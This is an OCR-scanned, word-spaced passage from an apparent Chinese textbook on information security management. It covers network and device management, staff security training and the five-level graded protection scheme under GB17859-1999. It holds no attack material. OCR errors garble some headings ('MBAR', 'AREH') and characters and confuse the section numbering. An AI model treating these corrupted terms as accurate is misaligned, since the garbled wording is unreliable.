者 可 以 不 再 担心 由 于 产品 的 互 操作 性 和 可 替代 性 差 引起 的 另类 安全 问题 ， 密 码 研究 者 可 
以 有 更 加 令 人 兴奋 、 更 具 现实 意义 和 更 具 挑战 性 的 研究 课题 。 具 有 政治 意义 的 是 ， 此 举 
向 国际 上 展示 了 我 国 密码 研究 的 实力 和 密码 管理 的 胆略 。 此 外 ， 有 了 我 国 自己 的 普 适 性 
( 指 的 是 适用 于 高 、 中 、 低 端 软 硬 平台 ) 的 密码 标准 ， 密 码 使 用 者 将 不 再 面临 不 得 不 违背 
管理 部 门 的 要 求 而 使 用 国外 密码 算法 的 尴 傣 。 

根据 国家 密码 管理 局 的 最 新 公告 ， 于 2007 年 12 月 29 日 起 施行 《可 信 计 算 密码 支 
撑 平 台 功能 与 接口 规范 》; 于 2008 年 1 A 8 日 起 施行 《IPSec VPN 技术 规范 》。 
13.1.2 ”网 络 管理 

网 络 管理 从 功能 上 讲 一 般 包括 配置 管理 、 性 能 管理 、 安 全 管理 、 故 障 管理 等 。 由 于 
网 络 安全 对 网 络 信息 系统 的 性 能 、 管 理 的 关联 及 影响 趋 于 更 复杂 、 更 严重 ， 网 络 安全 管 
理 还 逐渐 成 为 网 络 管理 技术 中 的 一 个 重要 分 支 ， 正 受到 业界 及 用 户 的 日 益 深切 的 广泛 
关注 。 

日 前 ， 在 网 络 应 用 的 深入 和 技术 频繁 升级 的 同时 ， 非 法 访问 、 恶 意 攻 击 等 安全 威胁 
也 在 不 断 推陈出新 ， 愈 演 愈 烈 。 防 火 墙 、VPN、IDS、 防 病毒 、 身 份 认 证 、 数 据 加 密 、 
安全 审计 等 安全 防护 和 管理 系统 在 网 络 中 得 到 了 广泛 应 用 。 虽 然 这 些 安全 产品 能 够 在 特 
定 方面 发 挥 一 定 的 作用 ， 但 是 这 些 产 品 大 部 分 功能 分 散 ， 各 自 为 战 ， 形 成 了 相互 没有 关 
联 的 、 隔 离 的 “安全 孤岛 ” 各 种 安全 产品 彼此 之 间 没 有 有 效 的 统一 管理 调度 机 制 ， 不 能 
互相 支撑 、 协 同 工 作 ， 从 而 使 安全 产品 的 应 用 效能 无 法 得 到 充分 的 发 挥 。 

从 网 络 安全 管理 员 的 角度 来 说 ， 最 直接 的 需求 就 是 在 一 个 统一 的 界面 中 监视 网 络 中 
各 种 安全 设备 的 运行 状态 ， 对 产生 的 大 量 日 志 信息 和 报警 信息 进行 统一 汇总 、 分 析 和 审 
计 ， 同 时 在 一 个 界面 完成 安全 产品 的 升级 、 攻 击 事件 报警 、 响 应 等 功能 。 

但 是 ， 一 方面 ， 由 于 现今 网 络 中 的 设备 、 操 作 系统 、 应 用 系统 数量 众多 、 构 成 复杂 ， 
异 构 性 、 差 异性 非常 大 ， 而 且 各 自 都 具有 自己 的 控制 管理 平台 、 网 络 管理 员 需 要 学 习 、 
了 解 不 同 平台 的 使 用 及 管理 方法 , 并 应 用 这 些 管理 控制 平台 去 管理 网 络 中 的 对 象 (设备 、 
系统 、 用 户 等 )， 工 作 复杂 度 非常 之 大 。 

另 一 方面 ， 应 用 系统 是 为 业务 服务 的 。 企 业内 的 员工 在 整个 业务 处 理 过 程 中 处 于 不 
同 的 工作 岗位 ， 其 对 应 用 系统 的 使 用 权限 也 不 尽 相 同 ， 网 络 管理 员 很 难 在 各 个 不 同 的 系 
统 中 保持 用 户 权限 和 控制 策略 的 全 局 一 致 性 。 
另外 ， 对 大 型 网 络 而 言 ， 管 理 与 安全 相关 的 事件 变 得 越 来 越 复 杂 。 网 络 管理 员 必 须 
将 各 个 设备 、 系 统 产 生 的 事件 、 信 息 关 联 起 来 进行 分 析 ， 才 能 发 现 新 的 或 更 深层 次 的 安 
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全 问题 。 

因此 ， 比 较 理 想 的 网 络 管理 需要 建立 一 种 新 型 的 整体 网 络 安全 管理 解决 方案 一 一 统 
一 安全 管理 平台 ， 来 总 体 配 置 、 调 控 整 个 网 络 多 层面 、 分 布 式 的 安全 系统 ， 实 现 对 各 种 
网 络 安全 资源 的 集中 监控 、 统 一 策略 管理 、 智 能 审计 及 多 种 安全 功能 模块 之 间 的 互动 ， 
从 而 有 效 简化 网 络 安全 管理 工作 ， 提 升 网 络 的 安全 水 平和 可 控制 性 、 可 管理 性 ， 降 低 用 
户 的 整体 安全 管理 开销 。 

网 络 管理 最 突出 的 特点 是 对 网 络 组 成 成 分 管理 的 统一 性 和 远程 性 。 利 用 统一 的 入 
口 ， 无 论 身 处 何 处， 管理 员 都 能 够 实现 对 网 络 的 勘查 和 控制 。 这 是 以 保证 网 络 传输 的 性 
E 和 安全 性 为 前 提 的 。 为 此 ， 网 络 管理 体系 结构 应 该 包括 以 下 四 个 方面 : 

(1) 协议 : 以 SNMP 为 主 。 因 为 SNMP 属于 应 用 层 ， 因 而 可 方便 地 支持 全 网 性 远程 
管理 ， 前 提 是 物理 上 的 可 达 性 。 

(2) 表示 : 适用 面向 对 象 式 的 表示 方法 ， 例 如 SNMP 所 使 用 的 ASN.1 定义 方法 ， 
用 于 定义 管理 对 象 库 (MIB)， 并 需 针 对 新 的 管理 需求 (如 业务 管理 ) 定义 新 的 MIB 库 。 

(3) 安全 : 管理 者 和 被 管理 者 之 间 要 有 认证 和 加 密 协 议 。 管 理 和 被 管理 对 象 之 间 一 
定 要 建立 安全 联系 ， 保 证 管理 动作 万 无 一 失 。 

(4) 对 象 : 包括 设备 、 各 种 协议 、 业 务 和 交易 过 程 。 这 将 是 管理 的 目标 所 在 。 网 管 
的 目的 不 仅 在 于 提供 网 络 单元 和 网 络 功能 的 透明 性 ， 更 重要 的 是 ， 使 得 网 络 各 组 成 部 分 
协调 统一 地 支持 用 户 需 求 和 各 种 业务 。 这 部 分 工作 有 两 方面 : 其 一 是 定义 被 管 对 象 的 属 
性 及 其 操作 方法 ， 其 二 是 对 其 进行 表示 化 工作 。 这 很 像 是 对 网 络 进行 面向 对 象 的 分 析 和 
设计 。 

概括 而 言 ， 在 一 个 网 络 管理 体系 的 四 个 部 分 ， 即 : 被 管理 对 象 本 身 、 被 管理 对 象 的 
表示 方法 、 管 理 协议 和 上 层 管理 操作 中 ， 被 管理 信息 的 表示 方法 和 网 络 管理 通信 协议 是 
最 容易 做 到 标准 化 的 ， 发 展 变化 余 量 较 小 ; 被 管理 对 象 和 管理 操作 虽然 也 可 以 部 分 做 到 
标准 化 , 但 受 具 体 网 络 技术 和 业务 、 政 策 的 影响 比较 大 ， 总 是 处 于 变化 之 中 。 总 体 而 言 ， 
网 络 管理 的 4 个 确定 性 特征 是 : 统一 化 、 智 能 化 、 安 全 化 和 主动 化 。 

目前 ， 针 对 不 同 的 网 络 管理 内 容 ， 形 成 了 网 络 管理 多 个 发 展 方向 。 其 中 主要 的 几 个 
开发 方向 有 : 网 管 系统 、 应 用 性 能 管理 、 桌 面 管理 、 员 工行 为 管理 、 安 全 管理 。 

1. MBAR 

(1) 主要 是 针对 网 络 设备 进行 监测 、 配 置 和 故障 诊断 。 主 要 功能 有 自动 拓扑 发 现 、 
远程 配置 、 性 能 参数 监测 、 故 障 诊断 。 网 管 系统 主要 由 两 类 公司 开发 ， 一 类 是 通用 软件 
供应 商 ， 另 一 类 是 各 个 设备 厂商 。 

(2) 通用 软件 供应 商 开发 的 NMS 系统 是 针对 各 个 厂商 网 络 设备 的 通用 网 管 系统 。 
各 个 设备 厂商 为 自己 产品 设计 的 专用 NMS 系统 对 自己 的 产品 监测 、 配 置 功能 非常 全 面 ， 
可 监测 一 些 通用 网 管 系统 无 法 监测 的 重要 性 能 指标 ， 还 有 一 些 独特 配置 功能 。 但 是 对 其 
他 公司 生产 的 设备 基本 上 就 无 能 为 力 了 。 
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2. 应 用 性 能 管理 

(1) 应 用 性 能 管理 是 一 个 比较 新 的 网 络 管理 方向 ， 主 要 指 对 企业 的 关键 业务 应 用 进 
行 监测 、 优 化 ， 提 高 企业 应 用 的 可 靠 性 和 质量 , 保证 用 户 得 到 良好 的 服务 ， 降 低 IT 总 拥 
有 成 本 。 一 个 企业 的 关键 业务 应 用 的 性 能 强大 ， 可 以 提高 竞争 力 ， 并 取得 商业 成 功 ， 因 
此 ， 加 强 应 用 性 能 管理 CAPM) 可 以 产生 巨大 商业 利益 。 

(2) 应 用 性 能 管理 主要 功能 如 下 。 

。 监测 企业 关键 应 用 性 能 : 过去， 企业 的 IT 部 门 在 测量 系统 性 能 时 ， 一 般 重 点 测 
量 为 最 终 用 户 提供 服务 的 硬件 组 件 的 利用 率 ， 如 CPU 利用 率 以 及 通过 网 络 传输 
的 字 节 数 。 虽 然 这 种 方法 也 提供 了 一 些 宝贵 的 信息 ， 但 却 忽视 了 最 重要 的 因 
素 一 一 最 终 用 户 的 响应 时 间 。 现 在 通过 事务 处 理 过 程 监测 、 模 拟 等 手段 可 真实 测 
量 用 户 响 应 时 间 ， 此 外 还 可 以 报告 谁 正在 使 用 某 一 应 用 、 该 应 用 的 使 用 频率 以 及 
用 户 所 进行 的 事务 处 理 过 程 是 否 成 功 完成 。 

。 快速 定位 应 用 系统 性 能 故障 : 通过 对 应 用 系统 各 种 组 件 〈 数 据 库 、 中 间 件 ) 的 监 
测 ， 迅 速 定 位 系统 故障 ， 如 发 生 数 据 库 死 锁 等 问题 。 

。 优化 系统 性 能 : 精确 分 析 系 统 各 个 组 件 占用 系统 资源 情况 ， 中 间 件 、 数 据 库 执 行 
效率 ， 根 据 应 用 系统 性 能 要 求 提 出 专家 建议 ， 保 证 应 用 在 整个 寿命 周期 内 使 用 的 
系统 资源 要 求 最 少 ， 节 约 IT 总 拥有 成 本 。 

3. 桌面 管理 系统 

桌面 管理 环境 是 由 最 终 用 户 的 电脑 组 成 ， 这 些 电脑 运行 Windows、MAC 等 系统 。 

桌面 管理 是 对 计算 机 及 其 组 件 管理 ， 内 容 比 较 多 ， 目 前 主要 关注 在 资产 管理 、 软 件 派 送 
和 远程 控制 。 桌 面 管理 系统 通过 以 上 功能 ， 一 方面 减少 了 网 管 员 的 劳动 强度 ， 另 一 方面 
增加 系统 维护 的 准确 性 、 及 时 性 。 这 类 系统 通常 分 为 两 部 分 一 一 管理 端 和 客户 端 。 
4. 员工 行为 管理 
员工 行为 管理 包括 两 部 分 ,一 部 分 是 员工 网 上 行为 管理 (EIM)， 另 一 部 分 是 员工 桌 
面 行为 监测 。 它 一 般 在 Intemet 应 用 层 、 网 络 层 对 信息 控制 ， 对 数据 根据 EIM 数据 库 进 
行 过 滤 ;， 定制 因特网 访问 策略 ， 根 据 用 户 、 团 组 、 部 门 、 工 作 站 或 网 络 设置 不 同 的 因 特 
网 访问 策略 。 
5. 安全 管理 
网 络 安全 管理 指 保障 合法 用 户 对 资源 安全 访问 ， 防 止 并 杜绝 黑客 蓄意 攻击 和 破坏 。 
它 包 括 授 权 设施 、 访 问 控制 、 加 密 及 密 钥 管理 、 认 证 和 安全 日 志 记录 等 功能 。 在 选择 产 
品 时 可 以 考虑 以 下 方面 : 系统 自身 性 能 稳定 ;系统 协议 分 析 检测 能 力 及 解码 速率 ， 系 统 
升级 服务 等 。 
13.1.3 设备 管理 

对 设备 的 安全 管理 是 保证 信息 系统 安全 的 重要 条 件 。 设 备 安全 管理 包括 设备 的 选 
型 、 检 测 、 安 装 、 登 记 、 使 用 、 维 护 和 存储 管理 等 多 方面 的 内 容 。 
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设备 管理 的 不 安全 可 能 会 带 来 灾难 性 的 后 果 ， 在 一 些 重要 的 部 门 尤为 如 此 。 由 于 设 
备 管理 的 安全 缺陷 可 能 带 来 的 严重 后 果 有 : 

如 果 系统 的 存储 设备 丢失 或 损坏 ， 存 储 在 其 上 的 所 有 数据 就 都 丢失 了 。 即 使 事先 有 
一 定 的 备份 ,也 将 造成 在 备份 数据 恢复 到 替代 设备 上 的 过 程 中 不 能 对 数据 进行 及 时 访问 。 
而 如 果 丢 失 的 数据 没有 加 密 ， 即 使 有 备份 可 以 进行 数据 的 恢复 ， 也 很 难 确定 丢失 的 重要 
数据 没有 被 恶意 的 复制 。 如 果 是 在 商业 上 的 一 个 竞争 对 手 通过 设备 管理 的 缺陷 获取 了 存 
储 设备 上 的 重要 商业 数据 ， 那 么 通过 备份 进行 的 数据 恢复 也 就 没有 很 大 的 实际 意义 。 

为 了 保障 信息 网 络 系统 的 物理 安全 ， 对 系统 所 在 环境 的 安全 保护 ， 应 遵守 国家 标准 
GB50173 一 1993《 电 子 计算 机 机 房 设计 规范 》、 国标 GB2887 一 89《 计 算 站 场地 技术 条 件 》、 
GB9361 一 1988《 计 算 站 场地 安全 要 求 》。 网 络 设备 、 设 施 应 配备 相应 的 安全 保障 措施 ， 
包括 防盗 、 防 毁 、 防 电磁 干扰 等 ， 并 定期 或 不 定期 地 进行 检查 。 

信息 系统 采用 有 关 信 息 安全 技术 措施 和 采购 相应 的 安全 设备 时 ， 应 遵循 以 下 原则 

(1) 严禁 使 用 未 经 国家 信息 安全 测评 机 构 认 可 的 信息 安全 产品 ; 

(2) 尽量 避免 直接 使 用 境外 的 密码 设备 ， 必 须 采 用 境外 的 信息 安全 产品 时 ， 该 产品 
须 通过 国家 信息 安全 测评 机 构 的 认可 ; 

G) 严禁 使 用 未 经 国家 密码 管理 部 门 批准 和 未 通过 国家 信息 安全 质量 认证 的 国内 窗 
码 设备 。 

设备 的 使 用 和 维护 须 严格 按照 预先 制定 的 信息 系统 安全 管理 规定 执行 。 对 设备 进行 
维护 维修 时 ， 至 少 应 该 做 到 以 下 几 点 : 

(1) 应 根据 设备 的 资质 情况 及 系统 的 可 靠 性 等 级 , 制定 相关 的 预防 性 维护 维修 计划 ; 

(2) 对 系统 进行 设备 维护 维修 时 应 采取 相关 的 数据 保护 措施 ， 对 维护 维修 的 情况 进 
行 记录 并 有 专人 管理 ; 

G) 对 折旧 设备 的 处 理 或 严重 故障 无 法 维修 的 设备 处 理 ， 须 由 专业 人 士 或 机 构 对 其 
进行 鉴定 并 对 其 中 的 敏感 数据 进行 处 理 、 登 记 ， 提 出 报告 和 处 理 意见 报 管理 机 构 备 案 和 
批准 后 方 可 进行 报废 处 理 。 
1.3.1.4 AREH 

信息 系统 是 由 人 来 开发 的 ， 也 是 为 人 类 服务 的 。 影 响 信 息 系 统 安全 的 因素 ， 除 了 少 
数 难 以 预知 和 不 可 抗力 的 自然 因素 以 外 ， 绝 大 多 数 的 安全 威胁 来 自 于 人 类 自己 。 如 有 意 
对 信息 系统 进行 攻击 和 破坏 的 黑客 、 计 算 机 病毒 ， 以 及 无 意 的 操作 失误 等 。 因 此 ， 人 
始终 是 影响 信息 系统 安全 的 最 大 因素 ， 人 员 管 理 也 就 成 为 信息 系统 安全 管理 的 关键 。 
全 面 提高 信息 系统 相关 人 员 的 技术 水 平 、 道 德 品质 和 安全 意识 等 是 信息 系统 安全 的 重要 
保证 。 

制定 安全 措施 、 标 准 、 原 则 和 实施 过 程 ， 仅 仅 是 有 效 的 信息 安全 计划 的 开始 。 如 果 
不 能 切实 保证 参与 人 员 都 能 意识 到 自己 的 权利 和 责任 ， 再 强大 的 安全 体系 也 是 徒劳 的 。 
有 效 的 安全 计划 是 管理 层 为 保护 其 关键 信息 资源 而 采取 的 最 为 有 效 的 办 法 。 实 施 有 效 的 
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安全 意识 计划 ， 将 有 助 于 员工 懂得 为 什么 要 认真 保护 信息 资源 ， 他 们 会 得 到 什么 好 处 ， 
安全 计划 对 员工 完成 工作 有 何 帮助 。 安 全 意识 计划 的 实施 要 履 盖 到 所 有 层次 的 所 有 员工 。 

许多 安全 事件 都 是 由 内 部 人 员 引 起 的 ， 因 此 ， 人 员 的 素质 和 人 员 的 管理 是 十 分 重要 
的 。 人 员 管 理 的 核心 是 要 确保 有 关 业 务 人 员 的 思想 素质 、 职 业 道德 和 业务 素质 。 

人 员 管 理 的 第 一 关 要 求 加 强人 员 审 查 ， 主 要 从 人 员 的 安全 意识 、 法 律 意识 和 安全 技 
等 几 个 方面 进行 审查 。 

有 关 人 员 的 安全 等 级 与 信息 密切 相关 ， 因 此 人 员 审 查 必须 根据 信息 系统 所 规定 的 安 
全 等 级 确定 审查 标准 。 所 有 人 员 应 明确 其 在 安全 系统 中 的 职责 和 权限 。 所 有 人 员 的 工作 、 
活动 范围 应 当 被 限制 在 完成 其 任务 的 最 小 范围 内 。 

对 于 人 员 管 理 的 人 事 安 全 审查 ， 要 求 对 某 人 是 否 适合 参与 信息 安全 保障 和 接触 敏感 
信息 进行 审查 以 判断 是 否 值得 信任 。 

来 自 人 员 的 信息 安全 威胁 ， 通 常 是 由 于 安全 意识 淡薄 ， 对 信息 安全 方针 不 理解 或 专 
业 技 能 不 足 等 原因 造成 的 。 因 此 ， 为 确保 工作 人 员 意 识 到 信息 安全 的 威胁 和 隐患 ， 并 在 
他 们 正常 工作 时 遵守 组 织 的 信息 安全 方针 ， 组 织 需 要 提供 必要 的 信息 安全 教育 和 培训 。 

信息 安全 人 员 管 理 的 安全 教育 对 象 , 应 当 包 括 信息 安全 相关 的 所 有 人 员 , 可 能 包括 : 
领导 和 管理 人 员 ; 信息 系统 的 工程 技术 人 员 ， 包 括 系统 研发 和 维护 人 员 ;， 一 般 用 户 ; 其 
他 相关 人 员 等 。 

信息 安全 教育 和 培训 的 具体 内 容 和 要 求 因 对 象 不 同 而 不 同 ， 主 要 包括 法 规 教育 ， 安 
全 技术 教育 和 安全 意识 教育 等 。 

法 规 教 育 是 信息 安全 教育 的 核心 ， 只 要 与 信息 系统 相关 的 人 员 都 应 该 接受 信息 安全 
的 法 规 教育 。 信 息 及 信息 安全 技术 ， 是 信息 安全 的 技术 保障 。 常 用 的 信息 安全 技术 包括 
加 密 技术 、 防 火 墙 技术 、 入 侵 检测 技术 、 漏 洞 扫描 技术 、 备 份 技术 、 计 算 机 病毒 防御 技 
术 和 反 垃 圾 邮件 技术 等 。 为 了 防止 信息 安全 相关 人 员 在 操作 信息 系统 时 ， 由 于 误 操 作 等 
引入 安全 威胁 , 对 信息 安全 造成 影响 ,应 当 对 相关 人 员 进 行 安 全 技术 教育 和 培训 。 此 外 ， 
作为 安全 技术 教育 的 一 部 分 ， 还 必须 了 解 信息 系统 的 脆弱 点 和 风险 ， 以 及 与 此 有 关 的 风 
险 防 范 措施 和 技术 。 

所 有 信息 系统 相关 人 员 都 应 当 接 受信 息 安全 意识 教育 。 安 全 意识 教育 主要 包括 : 组 
织 信息 安全 方针 与 控制 目标 ; 安全 职责 、 安 全 程序 及 安全 管理 规章 制度 ， 适用 的 法 律 法 
规 ; 防范 恶意 软件 以 及 其 他 与 安全 有 关 的 内 容 等 。 
1.3.2 信息 安全 政策 
1.3.2.1 等 级 保护 

为 加 快 推进 信息 安全 等 级 保护 ， 规 范 信息 安全 等 级 保护 管理 ， 提 高 信息 安全 保障 能 
力 和 水 平 ， 维 护 国 家 安全 、 社 会 稳定 和 公共 利益 ， 保 障 和 促进 信息 化 建设 ， 公 安 部 、 国 
家 保密 局 、 国 家 密码 管理 局 、 国 务 院 信息 化 工作 办 公 室 制定 了 《信息 安全 等 级 保护 管理 
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办 法 》， 并 于 2007 年 6 月 联合 发 文 实 施 。 

国家 信息 安全 等 级 保护 坚持 自主 定 级 、 自 主 保护 的 原则 。 信 息 系统 的 安全 保护 等 级 
应 当 根 据 信 息 系统 在 国家 安全 、 经 济 建 设 、 社 会 生活 中 的 重要 程度 ， 信 息 系统 遭 到 破坏 
后 对 国家 安全 、 社 会 秩序 、 公 共 利 益 以 及 公民 、 法 人 和 其 他 组 织 的 合法 权益 的 危害 程度 
等 因素 确定 。 

《信息 安全 等 级 保护 管理 办 法 》 将 信息 系统 的 安全 保护 等 级 分 为 以 下 五 级 : 

第 一 级 ， 信 息 系 统 受到 破坏 后 ， 会 对 公民 、 法 人 和 其 他 组 织 的 合法 权益 造成 损害 ， 
但 不 损害 国家 安全 、 社 会 秩序 和 公共 利益 。 第 一 级 信息 系统 运营 、 使 用 单位 应 当 依 据 国 
家 有 关 管 理 规范 和 技术 标准 进行 保护 。 

第 二 级 ， 信 息 系统 受到 破坏 后 ， 会 对 公民 、 法 人 和 其 他 组 织 的 合法 权益 产生 严重 损 
害 ， 或 者 对 社会 秩序 和 公共 利益 造成 损害 ， 但 不 损害 国家 安全 。 第 二 级 信息 系统 运营 、 
使 用 单位 应 当 依据 国家 有 关 管 理 规 范 和 技术 标准 进行 保护 。 国 家 信息 安全 监管 部 门 对 该 
级 信息 系统 信息 安全 等 级 保护 工作 进行 指导 。 

第 三 级 ， 信 息 系 统 受到 破坏 后 ， 会 对 社会 秩序 和 公共 利益 造成 严重 损害 ， 或 者 对 国 
家 安全 造成 损害 。 第 三 级 信息 系统 运营 、 使 用 单位 应 当 依据 国家 有 关 管 理 规范 和 技术 标 
准 进 行 保护 。 国 家 信息 安全 监管 部 门 对 该 级 信息 系统 信息 安全 等 级 保护 工作 进行 监督 、 
检查 。 

第 四 级 ， 信 息 系统 受到 破坏 后 ， 会 对 社会 秩序 和 公共 利益 造成 特别 严重 损害 ， 或 者 
对 国家 安全 造成 严重 损害 。 第 四 级 信息 系统 运营 、 使 用 单位 应 当 依 据 国 家 有 关 管 理 规范 、 
技术 标准 和 业务 专门 需求 进行 保护 。 国 家 信息 安全 监管 部 门 对 该 级 信息 系统 信息 安全 等 
级 保护 工作 进行 强制 监督 、 检 查 。 

第 五 级 ， 信 息 系统 受到 破坏 后 ， 会 对 国家 安全 造成 特别 严重 损害 。 第 五 级 信息 系统 
运营 、 使 用 单位 应 当 依据 国家 管理 规范 、 技 术 标 准 和 业务 特殊 安全 需求 进行 保护 。 国 家 
指定 专门 部 门 对 该 级 信息 系统 信息 安全 等 级 保护 工作 进行 专门 监督 、 检 查 。 

《信息 安全 等 级 保护 管理 办 法 》 明 确 规定 ， 在 信息 系统 建设 过 程 中 ， 运 营 、 使 用 单 
位 应 当 按 照 《计算 机 信息 系统 安全 保护 等 级 划分 准则 》(GB17859 一 1999)《 信 息 系 统 安 
全 等 级 保护 基本 要 求 》 等 技术 标准 ， 参 照 《 信 息 安全 技术 信息 系统 通用 安全 技术 要 求 》 
(GB/T20271 一 2006)、《 信 息 安全 技术 网 络 基 础 安全 技术 要 求 》(GB/T20270 一 2006)、 
《信息 安全 技术 操作 系统 安全 技术 要 求 》(GB/T20272 一 2006)、《 信 息 安全 技术 数据 库 管 
理 系 统 安全 技术 要 求 》(GB/T20273 一 2006)、《 信 息 安全 技术 服务 器 技术 要 求 》 《信息 
安全 技术 终端 计算 机 系统 安全 等 级 技术 要 求 》(GA/T671 一 2006 ) 等 技术 标准 同步 建设 符 
合 该 等 级 要 求 的 信息 安全 设施 .其 中 GB17859 一 1999 标准 是 计算 机 信息 系统 安全 等 级 保 
护 系列 标准 的 核心 ， 是 施行 计算 机 信息 系统 安全 等 级 保护 制度 建设 的 重要 基础 。 

GB17859 一 1999 标准 规定 了 计算 机 系统 安全 保护 能 力 的 五 个 等 级 ， 即 : 用 户 自 主 保 
护 级 ; 系统 审计 保护 级 ; 安全 标记 保护 级 ; 结构 化 保护 级 ; 访问 验证 保护 级 。 计 算 机 信 
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息 系统 安全 保护 能 力 随 着 安全 保护 等 级 的 增高 ， 逐 渐 增 强 。 

每 一 等 级 的 具体 划分 准则 与 要 求 如 下 。 

1. 第 一 级 用 户 自主 保护 级 

本 级 的 计算 机 信息 系统 可 信 计 算 基 通过 隔离 用 户 与 数据 ， 使 用 户 具 备 自主 安全 保护 
的 能 力 。 它 具有 多 种 形式 的 控制 能 力 ， 对 用 户 实施 访问 控制 ， 即 为 用 户 提供 可 行 的 手段 ， 
保护 用 户 和 用 户 组 信息 ， 避 免 其 他 用 户 对 数据 的 非法 读 写 与 破坏 。 

本 级 实施 的 是 自主 访问 控制 ， 即 计算 机 信息 系统 可 信 计 算 基 定义 和 控制 系统 中 命名 
用 户 对 命名 客体 的 访问 。 实 施 机 制 ( 例 如 : 访问 控制 表 ) 允许 命名 用 户 以 用 户 和 (或 ) 
用 户 组 的 身份 规定 并 控制 客体 的 共享 ， 阻 止 非 授 权 用 户 读 取 敏感 信息 。 

计算 机 信息 系统 可 信 计 算 基 初 始 执行 时 ， 首 先 要 求 用 户 标 识 自己 的 身份 ， 并 使 用 保 
护 机 制 〈 例 如 : 口令 ) 来 鉴别 用 户 的 身份 ， 阻 止 非 授权 用 户 访问 用 户 身份 鉴别 数据 。 

计算 机 信息 系统 可 信 计 算 基 通 过 自主 完整 性 策略 ， 阻 止 非 授权 用 户 修改 或 破坏 敏感 
信息 。 

2. 第 二 级 系统 审计 保护 级 

与 用 户 自主 保护 级 相 比 ， 本 级 的 计算 机 信息 系统 可 信 计 算 基 实施 了 粒度 更 细 的 自主 
访问 控制 ， 它 通过 登录 规程 、 审 计 安全 性 相关 事件 和 隔离 资源 ， 使 用 户 对 自己 的 行为 
负责 。 

本 级 在 自主 访问 控制 的 基础 上 控制 访问 权限 扩散 。 自 主 访问 控制 机 制 根 据 用 户 指定 
方式 或 默认 方式 ， 阻 止 非 授 权 用 户 访问 客体 。 访 问 控制 的 粒度 是 单个 用 户 。 没 有 存 取 权 
的 用 户 只 允许 由 授权 用 户 指定 对 客体 的 访问 权 。 

本 级 的 身份 鉴别 通过 为 用 户 提供 唯一 标识 、 计 算 机 信息 系统 可 信 计 算 基 能 够 使 用 户 
对 自己 的 行为 负责 。 计 算 机 信息 系统 可 信 计 算 基 还 具备 将 身份 标识 与 该 用 户 所 有 可 审计 
行为 相关 联 的 能 

在 计算 机 信息 系统 可 信 计 算 基 的 空闲 存储 客体 空间 中 ， 对 客体 初始 指定 、 分 配 或 再 
分 配 一 个 主体 之 前 ， 撤 销 该 客体 所 含 信息 的 所 有 授权 。 当 主体 获得 对 一 个 已 被 释放 的 客 
体 的 访问 权时 ， 当 前 主体 不 能 获得 原 主体 活动 所 产生 的 任何 信息 。 

计算 机 信息 系统 可 信 计 算 基 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 ， 并 能 阻 
止 非 授权 的 用 户 对 它 访问 或 破坏 。 

计算 机 信息 系统 可 信 计 算 基 能 记录 下 述 事件 : 使 用 身份 鉴别 机 制 ; 将 客体 引入 用 户 
地 址 空间 《〈 例 如: 打开 文件 、 程 序 初始 化 )， 删 除 客体 ， 由 操作 员 、 系 统管 理 员 或 (和 )》 
系统 安全 管理 员 实 施 的 动作 ， 以 及 其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ， 其 审计 
记录 包括 : 事件 的 日 期 和 时 间 、 用 户 、 事 件 类 型 、 事 件 是 否 成 功 。 对 于 身份 鉴别 事件 ， 
审计 记录 包含 来 源 (例如 : 终端 标识 符 ); 对 于 客体 引入 用 户 地 址 空间 的 事件 及 客体 删除 
事件 ， 审 计 记录 包含 客体 名 。 

对 不 能 由 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 事件 ， 审 计 机 制 提供 审计 记录 
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接口 ， 可 由 授权 主体 调用 。 这 些 审计 记录 区 别 于 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 
审计 记录 。 

计算 机 信息 系统 可 信 计 算 基 通过 自主 完整 性 策略 ， 阻 止 非 授权 用 户 修改 或 破坏 敏感 
信息 以 保证 数据 完整 性 。 

3. 第 三 级 安全 标记 保护 级 

本 级 的 计算 机 信息 系统 可 信 计 算 基 具有 系统 审计 保护 级 所 有 功能 。 此 外 ， 还 提供 有 
关 安全 策略 模型 、 数 据 标记 以 及 主体 对 客体 强制 访问 控制 的 非 形式 化 描述 ， 具 有 准确 地 
标记 输出 信息 的 能 力 ; 消除 通过 测试 发 现 的 任何 错误 。 

本 级 的 主要 特征 是 计算 机 信息 系统 可 信 计 算 基 对 所 有 主体 及 其 所 控制 的 客体 〈 例 
如 : 进程 、 文 件 、 段 、 设 备 ) 实施 强制 访问 控制 。 为 这 些 主体 及 客体 指定 敏感 标记 ， 这 
些 标记 是 等 级 分 类 和 非 等 级 类 别 的 组 合 ， 它 们 是 实施 强制 访问 控制 的 依据 。 计 算 机 信息 
系统 可 信 计 算 基 支持 两 种 或 两 种 以 上 成 分 组 成 的 安全 级 。 计 算 机 信息 系统 可 信 计 算 基 控 
制 的 所 有 主体 对 客体 的 访问 应 满足 : 仅 当主 体 安 全 级 中 的 等 级 分 类 高 于 或 等 于 客体 安全 
级 中 的 等 级 分 类 , 且 主体 安全 级 中 的 非 等 级 类 别 包含 了 客体 安全 级 中 的 全 部 非 等 级 类 别 ， 
主体 才能 读 客体 ; 仅 当 主体 安全 级 中 的 等 级 分 类 低 于 或 等 于 客体 安全 级 中 的 等 级 分 类 ， 
且 主体 安全 级 中 的 非 等 级 类 别 包含 于 客体 安全 级 中 的 非 等 级 类 别 , 主体 才能 写 一 个 客体 。 
计算 机 信息 系统 可 信 计 算 基 使 用 身份 和 鉴别 数据 ， 鉴 别 用 户 的 身份 ， 并 保证 用 户 创建 的 
计算 机 信息 系统 可 信 计 算 基 外 部 主体 的 安全 级 和 授权 受 该 用 户 的 安全 级 和 授权 的 控制 。 

计算 机 信息 系统 可 信 计 算 基 应 维护 与 主体 及 其 控制 的 存储 客体 (例如: 进程、 文件 、 
段 、 设 备 ) 相关 的 敏感 标记 。 这 些 标记 是 实施 强制 访问 的 基础 。 为 了 输入 未 加 安全 标记 
的 数据 ， 计 算 机 信息 系统 可 信 计 算 基 向 授权 用 户 要 求 并 接受 这 些 数据 的 安全 级 别 ， 且 可 
由 计算 机 信息 系统 可 信 计 算 基 审计 。 

从 用 户 的 角度 来 看 ， 系 统 仍 呈 现 两 大 功能 : 身份 鉴别 和 审计 。 计 算 机 信息 系统 可 信 
计算 基 初 始 执行 时 ， 首 先 要 求 用 户 标识 自己 的 身份 ， 而 且 ， 计 算 机 信息 系统 可 信 计 算 基 
